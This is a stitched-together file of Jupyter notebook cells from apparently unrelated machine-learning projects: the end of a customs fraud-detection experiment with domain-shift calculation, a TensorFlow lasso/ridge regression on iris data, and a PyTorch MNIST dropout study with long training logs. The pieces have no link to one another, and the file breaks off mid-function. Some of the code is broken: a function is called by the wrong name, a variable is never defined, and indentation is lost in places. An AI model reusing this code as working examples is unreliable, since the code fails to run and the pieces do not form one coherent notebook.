Overall F1:0.3987, AUC:0.7311, F1-top:0.4713
Early stopping...
--------Evaluating DATE model---------
CLS loss: 0.3001, REG loss: 0.0256
CLS loss: 0.2888, REG loss: 0.0255
Checking top 5% suspicious transactions: 42895
Precision: 0.4447, Recall: 0.2867, Revenue: 0.3504
CLS loss: 0.2888, REG loss: 0.0255
# of unique queried item: 42894, # of queried item: 42894, # of samples to be queried: 42894
--------Evaluating the model---------
Precision: 0.4363, Recall: 0.2812, Revenue: 0.3427
Metrics Active DATE:
[email protected]:0.4363, [email protected]:0.2812 [email protected]:0.3427
Simulation period is over.
Terminating ...
###Markdown
This will store the embeddings in './intermediary/embeddings/embd_0.pickle'. The domain shift between consecutive weeks will then be computed from these embeddings. Calculate domain shifts between weeks
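`ot.emd2` below solves the discrete optimal-transport problem between two weekly samples: with uniform weights $a_i = 1/n_s$, $b_j = 1/n_t$ and cost matrix $M_{ij} = \lVert x_s^i - x_t^j \rVert$, the shift is$$W(x_s, x_t) = \min_{P \in U(a, b)} \sum_{i,j} P_{ij} M_{ij}$$(the code normalizes $M$ by its maximum before solving and rescales the result afterwards).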
###Code
import pandas as pd
import numpy as np
import torch
import random
import pickle
import ot
with open("./intermediary/embeddings/embd_0.pickle","rb") as f :
processed_data = pickle.load(f)
###Output
_____no_output_____
###Markdown
Matching the datapoints together
###Code
datestart = '16-07-01'
from datetime import datetime, timedelta
date = datetime.strptime(datestart, "%y-%m-%d")
datelist0 = []
for i in range(51):
delta = i * 7
new_date = date + timedelta(days=delta)
datelist0.append(new_date.strftime('%y-%m-%d'))
enddate = datelist0[-1]
data = pd.read_csv('tdata.csv')
data = data[(data['sgd.date'] >= datestart) & (data['sgd.date'] < enddate)]
data.reset_index(drop=True, inplace=True)
###Output
_____no_output_____
###Markdown
Concat weekly data together
###Code
full_data = []
for i in range(len(datelist0) - 1):
data0 = data[(data['sgd.date'] >= datelist0[i]) & (data['sgd.date'] < datelist0[i+1])]
start = data0.index[0]
end = data0.index[-1]
xd = []
    for j in range(start, end + 1):
        # `datelist` (the per-row keys into the embedding dict) is assumed to
        # be defined in an earlier cell that is not shown here
        xd.append(processed_data[datelist[j]].reshape(1, -1))
full_data.append(torch.cat(xd, axis=0))
def domain_shift(xs, xt):
    # pairwise cost matrix, normalized by its maximum for numerical stability
    M = torch.cdist(xs, xt)
    max_dist = torch.max(M)
    M = (M / max_dist).data.cpu().numpy()
    # uniform marginals over both samples
    a = [1/xs.shape[0]] * xs.shape[0]
    b = [1/xt.shape[0]] * xt.shape[0]
    # ot.emd2 returns the optimal-transport (earth mover's) cost
    emd = ot.emd2(a, b, M)
    return emd * max_dist  # undo the normalization
arraycom = []
for i in range(81, len(full_data) - 1):
    stack = []
    for j in range(60):
        # compare random 500-point subsamples from consecutive weeks
        indices = torch.tensor(random.sample(range(full_data[i].shape[0]), 500))
        indices2 = torch.tensor(random.sample(range(full_data[i+1].shape[0]), 500))
        xs = full_data[i][indices]
        xt = full_data[i+1][indices2]
        shift = domain_shift(xs, xt)
        print(shift)
        stack.append(shift)
    mean_shift = np.mean(stack)
    print(mean_shift)
    arraycom.append(mean_shift)
###Output
_____no_output_____
###Markdown
arraycom now contains the domain-shift values between consecutive weeks. This part is about extracting the best resampling probability for each week.
###Code
def extraction(lol):
    # parse the [email protected] value out of the captured training output
    for i in lol:
if '[email protected]' in i:
xd = i.split(', ')[0]
value = float(xd.split(':')[1])
return value
probs = []
for i in range(0, len(datelist0) - 2):
highest = 0
day = datelist0[i]
for j in range(1, 10):
ratio = j * 0.1
bratio = 1 - ratio
lol = ! export CUDA_VISIBLE_DEVICES=3 && python main.py --data real-t --semi_supervised 0 --batch_size 128 --sampling hybrid --subsamplings xgb/random --weights $ratio/$bratio --mode scratch --train_from 20160101 --test_from $day --test_length 7 --valid_length 30 --initial_inspection_rate 20 --final_inspection_rate 5 --epoch 5 --closs bce --rloss full --save 0 --numweeks 2 --inspection_plan direct_decay
value = extract(lol)
if value > highest:
smt = bratio
probs.append(smt)
###Output
_____no_output_____
###Markdown
probs should contain the best resampling ratio for each week. Now we come to find the coefficients; first, transform the probs with the logit function.
###Code
news = []
for i in probs:
    news.append(np.log(i / (1 - i)))  # logit transform
newcom = np.reshape(arraycom, (-1, 1))
from sklearn.linear_model import LinearRegression
reg = LinearRegression()
reg.fit(newcom, news)
reg.coef_
reg.intercept_
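# The regression above fits logit(best ratio) against the weekly domain shift.
# A sketch (illustrative addition, not from the original notebook) of mapping
# a new week's shift back to a resampling probability by inverting the logit
# with a sigmoid:
def predict_prob(shift):
    z = reg.coef_[0] * shift + reg.intercept_
    return 1 / (1 + np.exp(-z))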
###Output
_____no_output_____ |
Lasso_and_Ridge_regression.ipynb | ###Markdown
[View in Colaboratory](https://colab.research.google.com/github/findingfoot/ML_practice-codes/blob/master/Lasso_and_Ridge_regression.ipynb)
###Code
import warnings
warnings.filterwarnings('ignore')
import sys
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn import datasets
from tensorflow.python.framework import ops
regression_type = 'lasso'
ops.reset_default_graph()
sess = tf.Session()
iris = datasets.load_iris()
x_vals = np.array([x[3] for x in iris.data])
y_vals = np.array([y[0] for y in iris.data])
#declare the batch size
batch_size = 25
#define the placeholders
x_data = tf.placeholder(shape = [None,1], dtype=tf.float32)
y_target = tf.placeholder(shape = [None,1], dtype=tf.float32)
#set the seed
seed = 23
np.random.seed(seed)
tf.set_random_seed(seed)
#set the variables for the regression
A = tf.Variable(tf.random_normal(shape = [1,1]))
b = tf.Variable(tf.random_normal(shape = [1,1]))
#model output
model_output = tf.add(tf.matmul(x_data, A), b)
#Loss function
if regression_type == 'lasso':
# Declare Lasso loss function
    # Lasso Loss = L2_Loss + heaviside_step penalty,
    # where the heaviside factor is ~0 if A < lasso_param and ~1 otherwise,
    # so the added penalty is ~0 or ~99
lasso_param = tf.constant(0.9)
heavyside_step = tf.truediv(1., tf.add(1., tf.exp(tf.multiply(-50., tf.subtract(A, lasso_param)))))
regularization_param = tf.multiply(heavyside_step, 99.)
loss = tf.add(tf.reduce_mean(tf.square(y_target - model_output)), regularization_param)
elif regression_type == 'ridge':
#Declare the Ridge loss function
# Ridge loss = L2_loss + L2 norm of slope
ridge_param = tf.constant(1.)
ridge_loss = tf.reduce_mean(tf.square(A))
loss = tf.expand_dims(tf.add(tf.reduce_mean(tf.square(y_target - model_output)),
tf.multiply(ridge_param, ridge_loss)), 0)
else:
print('Invalid regression_type parameter value',file=sys.stderr)
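# Illustration (added; not part of the original notebook): the smooth
# "heaviside" factor above is a steep sigmoid in the slope A -- close to 0
# well below lasso_param (0.9), close to 1 well above it, and transitioning
# smoothly near the threshold, which is what keeps the penalty differentiable.
for a_val in [0.5, 0.89, 0.91, 1.5]:
    print(a_val, 1.0 / (1.0 + np.exp(-50.0 * (a_val - 0.9))))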
#optimizer
my_opt = tf.train.GradientDescentOptimizer(0.001)
train_step = my_opt.minimize(loss)
#initialize the variable
init = tf.global_variables_initializer()
sess.run(init)
#calculate the regression
loss_vec = []
for i in range(1500):
rand_index = np.random.choice(len(x_vals), size = batch_size)
rand_x = np.transpose([x_vals[rand_index]])
rand_y = np.transpose([y_vals[rand_index]])
sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y})
temp_loss = sess.run(loss, feed_dict={x_data: rand_x, y_target: rand_y})
#print(temp_loss.shape)
loss_vec.append(temp_loss[0])
if (i+1)%300==0:
print('Step #' + str(i+1) + ' A = ' + str(sess.run(A)) + ' b = ' + str(sess.run(b)))
print('Loss = ' + str(temp_loss))
print('\n')
#get the regression coefficients
[slope] = sess.run(A)
[intercept] = sess.run(b)
best_fit = []
for i in x_vals:
best_fit.append(slope*i+ intercept)
print(len(loss_vec))
import jupyterthemes as jt
from jupyterthemes import jtplot
jtplot.style(context='talk', fscale=1.4, spines=False, gridlines='--')
plt.plot(x_vals, y_vals, 'go', label = 'Data')
plt.plot(x_vals, best_fit, 'b-', label = 'Best_fit')
plt.legend(loc ='best')
plt.show()
#plot loss over time
plt.plot(loss_vec, 'r-')
plt.title(regression_type + ' Loss per Generation')
plt.xlabel('Generation')
plt.ylabel('Loss')
plt.show()
###Output
_____no_output_____ |
hw3/baseline_dropout.ipynb | ###Markdown
**These code cells were run on Google Colab with GPU support.**
###Code
import torch
if torch.cuda.is_available():
device = torch.device("cuda:0")
print("GPU")
else:
device = torch.device("cpu")
print("CPU")
###Output
GPU
###Markdown
**Fetching the data**
###Code
from sklearn.datasets import fetch_openml
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
mnist = fetch_openml("mnist_784", version=1)
print(mnist.keys())
###Output
dict_keys(['data', 'target', 'frame', 'feature_names', 'target_names', 'DESCR', 'details', 'categories', 'url'])
###Markdown
**Plotting one example of each class**
###Code
X = mnist["data"]
Y = mnist["target"]
Y = Y.astype(int)
X=(X/255 - 0.5)*2
fig, ax = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True)
ax = ax.flatten()
for i in range(10):
for x, y in zip(X, Y):
if y==i:
img=np.array(x).reshape((28,28))
ax[i].imshow(img, cmap="Greys")
break
ax[0].set_yticks([])
ax[0].set_xticks([])
plt.tight_layout()
plt.show()
###Output
_____no_output_____
###Markdown
**Out of the 70k examples, 10k will be used for the test set, and the remaining 60k will be used for training and validation.**
###Code
X_train, X_test, Y_train, Y_test = X[:60000], X[60000:], Y[:60000], Y[60000:]
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits=1, test_size=0.1, random_state=42)
for train_index, val_index in split.split(X_train,Y_train):
X_train_strat = X_train[train_index, :]
Y_train_strat = Y_train[train_index]
X_val_strat = X_train[val_index, :]
Y_val_strat = Y_train[val_index]
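# Sanity check (illustrative addition, not in the original): the stratified
# split should preserve the class proportions between the training and
# validation sets.
print(np.bincount(Y_train_strat) / len(Y_train_strat))
print(np.bincount(Y_val_strat) / len(Y_val_strat))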
import torch.nn as nn
import torch.nn.functional as Func
from torch.autograd import Variable
import torch.optim as optim
import torch.utils.data as data
import random
from scipy.io import savemat
import os
from os import path
from sklearn.preprocessing import normalize
from torch.nn.utils import clip_grad_norm_
import torch.nn.parallel.data_parallel as data_parallel
from sklearn.metrics import confusion_matrix
###Output
_____no_output_____
###Markdown
**Extending and overriding methods for our own dataset**
###Code
class mnist_dataset(data.Dataset):
def label_transformer(self, labels):
return labels
def __init__(self, input_data, labels):
input_data = input_data.reshape((len(input_data),1,28,28))
self.feats = input_data
self.labels = self.label_transformer(labels)
def __len__(self):
return len(self.labels)
def __getitem__(self, index):
x = self.feats[index]
y = self.labels[index]
return x,y
###Output
_____no_output_____
###Markdown
**Creating dataloader for each of the train, validation, test dataset.**
###Code
class hyperparam:
bs = 100
lr = 0.05
num_epochs = 50
params = {
"batch_size": hyperparam.bs,
"shuffle": True,
"num_workers": 2,
"drop_last": False,
"pin_memory": True
}
train_set = mnist_dataset(X_train_strat, Y_train_strat)
val_set = mnist_dataset(X_val_strat, Y_val_strat)
test_set = mnist_dataset(X_test, Y_test)
training_gen = data.DataLoader(train_set, **params)
val_gen = data.DataLoader(val_set, **params)
test_gen = data.DataLoader(test_set, **params)
###Output
_____no_output_____
###Markdown
**We create a DNN with two CNN layers of 12 filters each, followed by two fully connected layers of 100 and 10 neurons respectively. Each convolution is followed by a 2x2 max-pool, so the 28x28 input is reduced to 7x7 and the flattened size is 12\*7\*7 = 588. We use the ReLU activation function, an initial learning rate of 0.05, and Glorot initialization. We add a dropout layer after each hidden layer in the network; the dropout value is taken in the constructor and remains the same for all the dropout layers in the model.**
###Code
from torch.nn import Conv2d, Linear
from torch import flatten
class dropout_cnn(nn.Module):
def glorot_initialize(self, layers):
for layer in layers:
torch.nn.init.xavier_normal_(layer.weight)
torch.nn.init.zeros_(layer.bias)
def __init__(self, dropout_val):
super(dropout_cnn, self).__init__()
self.conv1 = Conv2d(1,12,kernel_size=(3,3), padding = 1)
self.conv2 = Conv2d(12,12,kernel_size=(3,3), padding = 1)
self.fc1 = Linear(588, 100)
self.fc2 = Linear(100, 10)
self.dropout = nn.Dropout(dropout_val)
self.glorot_initialize([self.conv1, self.conv2, self.fc1, self.fc2])
def forward(self, sig):
sig = Func.max_pool2d(Func.relu(self.conv1(sig)), (2, 2))
sig = self.dropout(sig)
sig = Func.max_pool2d(Func.relu(self.conv2(sig)), (2, 2))
sig = self.dropout(sig)
sig = sig.view(-1, 12*7*7)
sig = Func.relu(self.fc1(sig))
sig = self.dropout(sig)
sig = self.fc2(sig)
        return sig
        # no softmax here: nn.CrossEntropyLoss applies log-softmax internally
        # return Func.softmax(sig, dim = 1)
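# Shape sanity check (illustrative addition): a dummy batch flows
# (N,1,28,28) -> conv+pool -> (N,12,14,14) -> conv+pool -> (N,12,7,7)
# -> flatten to 588 -> fc 100 -> fc 10
print(dropout_cnn(0.25)(torch.zeros(2, 1, 28, 28)).shape)  # torch.Size([2, 10])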
###Output
_____no_output_____
###Markdown
**Each model is trained for 50 epochs; after every epoch we print the validation accuracy and the current learning rate, which is decayed by 10% every 10 epochs. We also use an early-stopping mechanism, which stops training if the validation accuracy drops for 5 consecutive epochs. This is done to prevent overfitting.****We create three separate models, each using a different dropout value. We train each of these for up to 50 epochs with early stopping and record how they perform.**
###Code
cnn_models = [dropout_cnn(0.25).to(device), dropout_cnn(0.5).to(device), dropout_cnn(0.75).to(device)]
from tqdm import tqdm
from datetime import datetime
from torch.optim.lr_scheduler import StepLR
tr_avg_loss_list = {0: [], 1:[], 2:[]}
tr_accuracy_list = {0: [], 1:[], 2:[]}
val_avg_loss_list = {0: [], 1:[], 2:[]}
val_accuracy_list = {0: [], 1:[], 2:[]}
print(datetime.now())
for model_num, cnn_model in enumerate(cnn_models):
optimizer = torch.optim.SGD(cnn_model.parameters(), lr = hyperparam.lr, momentum=0.9)
scheduler = StepLR(optimizer, step_size=10, gamma=0.9)
loss = nn.CrossEntropyLoss()
for epoch in range(hyperparam.num_epochs):
print("Epoch:" + str(epoch) + " dropout: " + str((model_num+1)*0.25))
tr_num_correct = 0
tr_num_samples = 0
tr_total_loss = 0
val_num_correct = 0
val_num_samples = 0
val_total_loss = 0
print("Learning rate: " + str(optimizer.param_groups[0]['lr']))
cnn_model.train(True)
with torch.set_grad_enabled(True):
for ind, (local_batch, local_labels) in enumerate(training_gen):
optimizer.zero_grad()
                local_batch, local_labels = Variable(local_batch).float(), Variable(local_labels)
local_batch = local_batch.to(device)
local_labels = local_labels.to(device)
out1 = cnn_model(local_batch)
ploss = loss(out1, local_labels.long())
tr_total_loss += ploss * hyperparam.bs
ploss.backward()
optimizer.step()
sel_class = torch.argmax(out1, dim=1)
tr_num_correct += sel_class.eq(local_labels).sum().item()
tr_num_samples += hyperparam.bs
tr_avg_loss = tr_total_loss / len(training_gen.dataset)
tr_avg_loss_list[model_num].append(tr_avg_loss)
tr_accuracy = tr_num_correct / len(training_gen.dataset)
tr_accuracy_list[model_num].append(tr_accuracy)
with torch.set_grad_enabled(False):
cnn_model.eval()
for local_batch, local_labels in val_gen:
local_batch = local_batch.float()
local_labels = local_labels.float()
local_batch, local_labels = Variable(local_batch), Variable(local_labels)
local_batch = local_batch.to(device)
local_labels = local_labels.to(device)
out1 = cnn_model(local_batch)
ploss = loss(out1, local_labels.long())
val_total_loss += ploss * hyperparam.bs
sel_class = torch.argmax(out1, dim=1)
val_num_correct += sel_class.eq(local_labels).sum().item()
val_num_samples += local_labels.size(0)
val_avg_loss = val_total_loss / len(val_gen.dataset)
val_avg_loss_list[model_num].append(val_avg_loss)
val_accuracy = val_num_correct / len(val_gen.dataset)
print("Validation accuracy: " + str(val_accuracy))
val_accuracy_list[model_num].append(val_accuracy)
scheduler.step()
if epoch > 10:
if sum([val_accuracy_list[model_num][i] < val_accuracy_list[model_num][i-1] for i in range(epoch-5, epoch)]) == 5:
break
###Output
2021-04-11 08:04:37.031426
Epoch:0 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9748333333333333
Epoch:1 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9815
Epoch:2 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9846666666666667
Epoch:3 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9858333333333333
Epoch:4 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9865
Epoch:5 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.985
Epoch:6 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9848333333333333
Epoch:7 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9868333333333333
Epoch:8 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9866666666666667
Epoch:9 dropout: 0.25
Learning rate: 0.05
Validation accuracy: 0.9858333333333333
Epoch:10 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9865
Epoch:11 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9866666666666667
Epoch:12 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9868333333333333
Epoch:13 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9883333333333333
Epoch:14 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.99
Epoch:15 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9883333333333333
Epoch:16 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9886666666666667
Epoch:17 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9895
Epoch:18 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9886666666666667
Epoch:19 dropout: 0.25
Learning rate: 0.045000000000000005
Validation accuracy: 0.9876666666666667
Epoch:20 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.988
Epoch:21 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9876666666666667
Epoch:22 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9891666666666666
Epoch:23 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9891666666666666
Epoch:24 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9886666666666667
Epoch:25 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9895
Epoch:26 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9898333333333333
Epoch:27 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9886666666666667
Epoch:28 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9901666666666666
Epoch:29 dropout: 0.25
Learning rate: 0.04050000000000001
Validation accuracy: 0.9885
Epoch:30 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9873333333333333
Epoch:31 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9888333333333333
Epoch:32 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9896666666666667
Epoch:33 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9905
Epoch:34 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9886666666666667
Epoch:35 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.989
Epoch:36 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9898333333333333
Epoch:37 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9888333333333333
Epoch:38 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9888333333333333
Epoch:39 dropout: 0.25
Learning rate: 0.03645000000000001
Validation accuracy: 0.9898333333333333
Epoch:40 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9886666666666667
Epoch:41 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9895
Epoch:42 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9896666666666667
Epoch:43 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9908333333333333
Epoch:44 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:45 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:46 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9898333333333333
Epoch:47 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.989
Epoch:48 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:49 dropout: 0.25
Learning rate: 0.03280500000000001
Validation accuracy: 0.9903333333333333
Epoch:0 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.955
Epoch:1 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.964
Epoch:2 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9623333333333334
Epoch:3 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9708333333333333
Epoch:4 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9686666666666667
Epoch:5 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9705
Epoch:6 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9668333333333333
Epoch:7 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9731666666666666
Epoch:8 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.964
Epoch:9 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9748333333333333
Epoch:10 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9773333333333334
Epoch:11 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9761666666666666
Epoch:12 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9748333333333333
Epoch:13 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9773333333333334
Epoch:14 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9748333333333333
Epoch:15 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9783333333333334
Epoch:16 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9735
Epoch:17 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9773333333333334
Epoch:18 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9755
Epoch:19 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9758333333333333
Epoch:20 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.977
Epoch:21 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9763333333333334
Epoch:22 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9775
Epoch:23 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9755
Epoch:24 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9766666666666667
Epoch:25 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9805
Epoch:26 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9775
Epoch:27 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9785
Epoch:28 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9783333333333334
Epoch:29 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9773333333333334
Epoch:30 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9803333333333333
Epoch:31 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9796666666666667
Epoch:32 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9776666666666667
Epoch:33 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9793333333333333
Epoch:34 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.981
Epoch:35 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9805
Epoch:36 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9823333333333333
Epoch:37 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9781666666666666
Epoch:38 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9793333333333333
Epoch:39 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9801666666666666
Epoch:40 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9811666666666666
Epoch:41 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9803333333333333
Epoch:42 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9795
Epoch:43 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9773333333333334
Epoch:44 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9781666666666666
Epoch:45 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9791666666666666
Epoch:46 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9801666666666666
Epoch:47 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9788333333333333
Epoch:48 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9808333333333333
Epoch:49 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9798333333333333
Epoch:0 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5011666666666666
Epoch:1 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5135
Epoch:2 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5058333333333334
Epoch:3 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.6595
Epoch:4 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5408333333333334
Epoch:5 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.6855
Epoch:6 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.7258333333333333
Epoch:7 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5355
Epoch:8 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5601666666666667
Epoch:9 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5706666666666667
Epoch:10 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5713333333333334
Epoch:11 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5448333333333333
Epoch:12 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5766666666666667
Epoch:13 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5808333333333333
Epoch:14 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5835
Epoch:15 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5678333333333333
Epoch:16 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5818333333333333
Epoch:17 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.6265
Epoch:18 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.6201666666666666
Epoch:19 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.6175
Epoch:20 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.6065
Epoch:21 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.592
Epoch:22 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.5908333333333333
Epoch:23 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.6008333333333333
###Markdown
**Plotting learning curves for validation and train dataset**
###Code
def plot_x_y_vals(x_vals, y_vals, x_label, y_label, label, line_titles):
for i in range(len(x_vals)):
plt.plot(x_vals[i], y_vals[i], label=line_titles[i])
plt.title(label)
plt.legend()
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.show()
for i in tr_accuracy_list:
    epochs = [e+1 for e in range(len(tr_accuracy_list[i]))]
    plot_x_y_vals([epochs, epochs], [tr_accuracy_list[i], val_accuracy_list[i]], "Epochs", "Accuracy", "Train & Validation Accuracy, drop: " + str((i+1)*0.25), ["train", "validation"])
    plot_x_y_vals([epochs, epochs], [tr_avg_loss_list[i], val_avg_loss_list[i]], "Epochs", "Loss", "Train & Validation Loss, drop: " + str((i+1)*0.25), ["train", "validation"])
###Output
_____no_output_____
###Markdown
**Overfit or Underfit? Why is validation accuracy higher than training accuracy?** Surprisingly, we see that validation accuracy is higher than training accuracy. This is because of the dropout layers: during the training phase they zero out some activations, while in the evaluation phase they do not. That is why the model performs better during validation.**For dropout = 0.25**, the model does really well. Validation accuracy continues to increase while validation loss continues to decrease, and the dropout layer keeps the model from overfitting. With dropout = 0.25 we seem to have achieved the balance where the plot indicates neither overfitting nor underfitting, as the validation and training curves converge. As can be seen in the plot, the validation accuracy stands around ~98%.**For dropout = 0.5**, the model does not perform as well as with dropout = 0.25; the accuracy is around ~98% but slightly lower, which is a sign of **slight underfitting.** The model is too simplistic and captures only the most salient features of the image while ignoring the finer ones, because the high dropout value of 0.5 removes much of the detail.**For dropout = 0.75**, the model only reaches an accuracy around 60%. Definitely not as good, and clearly **underfitting**: the dropout layers remove most of the relevant information, so the model works on heavily simplified data and makes very generic assumptions about the images. **Checking the accuracy of the test set**
###Code
total_accurate = [0,0,0]
total_values = [0,0,0]
errors={0:{i:{j:0 for j in range(10)} for i in range(10)}, 1:{i:{j:0 for j in range(10)} for i in range(10)}, 2:{i:{j:0 for j in range(10)} for i in range(10)}}
incorrect_samples = {0:[], 1:[], 2:[]}
correct_samples = {0:[], 1:[], 2:[]}
def calculate_class_wise_errors(local_labels, sel_class, local_batch, model_num):
    # tally the incorrect predictions
